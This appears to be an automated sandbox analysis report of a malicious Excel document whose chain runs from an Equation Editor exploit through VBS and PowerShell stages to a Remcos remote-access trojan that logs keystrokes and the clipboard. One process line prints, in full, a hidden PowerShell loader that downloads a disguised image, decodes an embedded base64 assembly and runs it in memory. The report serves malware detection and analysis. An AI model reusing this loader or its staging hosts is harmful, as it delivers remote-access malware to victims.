            Source: wscript.exe, 00000009.00000003.431940170.00000000030D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431827511.00000000006F1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.433509390.00000000006D4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.433992431.0000000000716000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431970404.000000000079A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431827511.000000000079A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/iuC2i
            Source: wscript.exe, 00000009.00000003.431827511.00000000006F1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.433992431.0000000000716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/iuC2igv
            Source: wscript.exe, 00000009.00000002.436417928.0000000003AA6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/e
            Source: wscript.exe, 00000009.00000003.432521109.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431629042.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431571140.0000000003AD0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431892049.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.436432327.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431591415.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.477785176.0000000005030000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
            Source: wscript.exe, 00000009.00000003.431940170.00000000030D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431970404.000000000079A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.433992431.000000000079A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431827511.000000000079A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.gravatar.com
            Source: wscript.exe, 00000009.00000003.431940170.00000000030D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431970404.000000000079A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.433992431.000000000079A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431827511.000000000079A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://themes.googleusercontent.com
            Source: powershell.exe, 0000000C.00000002.466787853.00000000028AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uploaddeimagens.com.br
            Source: powershell.exe, 0000000C.00000002.477785176.0000000005013000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uploaddeimagens.com.br/images/00
            Source: powershell.exe, 0000000C.00000002.466017329.00000000003F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634
            Source: wscript.exe, 00000009.00000003.431940170.00000000030D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431970404.000000000079A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.433992431.000000000079A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431827511.000000000079A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: wscript.exe, 00000009.00000003.431940170.00000000030D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431970404.000000000079A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.433992431.000000000079A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431827511.000000000079A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com;
            Source: wscript.exe, 00000009.00000003.431940170.00000000030D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431970404.000000000079A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.433992431.000000000079A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431827511.000000000079A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49174
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49173
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49172
            Source: unknownNetwork traffic detected: HTTP traffic on port 49172 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49173 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49174 -> 443
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49172 version: TLS 1.2

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0040A2B8 SetWindowsHookExA 0000000D,0040A2A4,0000000017_2_0040A2B8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0040B70E OpenClipboard,GetClipboardData,CloseClipboard,17_2_0040B70E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_004168C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,17_2_004168C1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0040A3E0 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,17_2_0040A3E0

            E-Banking Fraud

            Source: Yara match, File source: 17.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 17.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 12.2.powershell.exe.465ae68.1.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 12.2.powershell.exe.465ae68.1.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000011.00000002.1078551055.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 0000000C.00000002.466787853.0000000004477000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: Process Memory Space: powershell.exe PID: 3608, type: MEMORYSTR
            Source: Yara match, File source: Process Memory Space: RegAsm.exe PID: 3972, type: MEMORYSTR
            Source: Yara match, File source: C:\Users\user\AppData\Local\Temp\note\nots.dat, type: DROPPED

            System Summary

            Source: 17.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
            Source: 17.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants, Author: unknown
            Source: 17.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Author: ditekSHen
            Source: 17.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
            Source: 17.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants, Author: unknown
            Source: 17.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Author: ditekSHen
            Source: 12.2.powershell.exe.465ae68.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
            Source: 12.2.powershell.exe.465ae68.1.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants, Author: unknown
            Source: 12.2.powershell.exe.465ae68.1.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Author: ditekSHen
            Source: 12.2.powershell.exe.465ae68.1.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
            Source: 12.2.powershell.exe.465ae68.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Author: ditekSHen
            Source: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
            Source: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: REMCOS_RAT_variants, Author: unknown
            Source: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Author: ditekSHen
            Source: 0000000C.00000002.466787853.0000000004477000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
            Source: Process Memory Space: powershell.exe PID: 3508, type: MEMORYSTR, Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution, Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 3608, type: MEMORYSTR, Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
            Source: Process Memory Space: powershell.exe PID: 3608, type: MEMORYSTR, Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution, Author: ditekSHen
            Source: Process Memory Space: RegAsm.exe PID: 3972, type: MEMORYSTR, Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\lioniskingandtigerisalsotryingforkingbutdifferentistheattitudeofthistwoanimalaredifferentlionsisalwaysalionitsucantcomparewith__anyotherbecauselionbeauties[1].doc, type: DROPPED, Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Author: ditekSHen
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A9EAB33D.doc, type: DROPPED, Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Author: ditekSHen
            Source: Ref19920830281982938RT.xls, OLE: Microsoft Excel 2007+
            Source: FE430000.0.dr, OLE: Microsoft Excel 2007+
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, File created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\nLNG.url
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, File created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\z2.ink.url
            Source: C:\Windows\SysWOW64\wscript.exe, Process created: Commandline size = 8818
            Source: C:\Windows\SysWOW64\wscript.exe, COM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}\ProgID
            Source: C:\Windows\System32\wscript.exe, COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgID
            Source: C:\Windows\SysWOW64\wscript.exe, Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = '…
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Process Stats: CPU usage > 49%
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Memory allocated: 770B0000 page execute and read and write
            Source: C:\Windows\SysWOW64\wscript.exe, Memory allocated: 770B0000 page execute and read and write
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Memory allocated: 770B0000 page execute and read and write
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 17_2_004167B4 ExitWindowsEx,LoadLibraryA,GetProcAddress
            Source: Ref19920830281982938RT.xls, OLE indicator, VBA macros: true
            Source: Ref19920830281982938RT.xlsStream path 'MBD001E4BEC/\x1Ole' : http://z2.ink/nLNGhKt{<%~)5s,wNcVbzaO2YFM6VhCzCTBQuiK9XvdfmZmfdi19qSykkuSoqGg13idxwqM80I2QlHhYka25mheOAqXWuc87241380C68jQ9775EUFqwHZcu07LqdVQvsltQ2jpPKnYENX8EPyVnwuWH5tio4C8sw95KTGoNtJFMIoavuLM7sBe84aUlir5LYkIQaJ3HtEUdylhd5rUhFbtEQgYfCE1ahMCmjRDB5e2;b?(Dz|l6j8RX)
            Source: ~WRF{8D0975D7-21A3-4DB8-9D99-C358C75C774D}.tmp.4.dr, OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: String function: 00434E10 appears 54 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: String function: 00402093 appears 50 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: String function: 00434770 appears 41 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: String function: 00401E65 appears 34 times
            Source: 17.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 17.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 17.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
            Source: 17.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 17.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 17.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
            Source: 12.2.powershell.exe.465ae68.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 12.2.powershell.exe.465ae68.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 12.2.powershell.exe.465ae68.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
            Source: 12.2.powershell.exe.465ae68.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 12.2.powershell.exe.465ae68.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
            Source: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
            Source: 0000000C.00000002.466787853.0000000004477000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: Process Memory Space: powershell.exe PID: 3508, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 3608, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: Process Memory Space: powershell.exe PID: 3608, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: RegAsm.exe PID: 3972, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\lioniskingandtigerisalsotryingforkingbutdifferentistheattitudeofthistwoanimalaredifferentlionsisalwaysalionitsucantcomparewith__anyotherbecauselionbeauties[1].doc, type: DROPPEDMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A9EAB33D.doc, type: DROPPEDMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
            Source: classification engine, Classification label: mal100.spre.troj.spyw.expl.evad.winXLS@19/35@11/5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 17_2_00417952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 17_2_0040F474 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 17_2_0041B4A8 FindResourceA,LoadResource,LockResource,SizeofResource
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 17_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: C:\Users\user\Desktop\FE430000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Mutant created: NULL
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Mutant created: \Sessions\1\BaseNamedObjects\Rmc-999Z97
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: C:\Users\user\AppData\Local\Temp\CVR7731.tmp
            Source: Ref19920830281982938RT.xls, OLE indicator, Workbook stream: true
            Source: FE430000.0.dr, OLE indicator, Workbook stream: true
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\onsandtigerbeautifulpicture.vbs"
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File read: C:\Users\desktop.ini
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, File read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\SysWOW64\wscript.exe, File read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, File read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, File read: C:\Windows\System32\drivers\etc\hosts
            Source: Ref19920830281982938RT.xls, Virustotal: Detection: 7%
            Source: unknown, Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\onsandtigerbeautifulpicture.vbs"
            Source: C:\Windows\SysWOW64\wscript.exe, Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = '…
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.EWH/005001/451.871.64.891//:ptth' , '1' , 'C:\ProgramData\' , 'incontrovertido','RegAsm',''))} }"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\incontrovertido.vbs
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
            Source: unknown, Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\incontrovertido.vbs"
            Source: unknown, Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\incontrovertido.vbs"
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\onsandtigerbeautifulpicture.vbs"
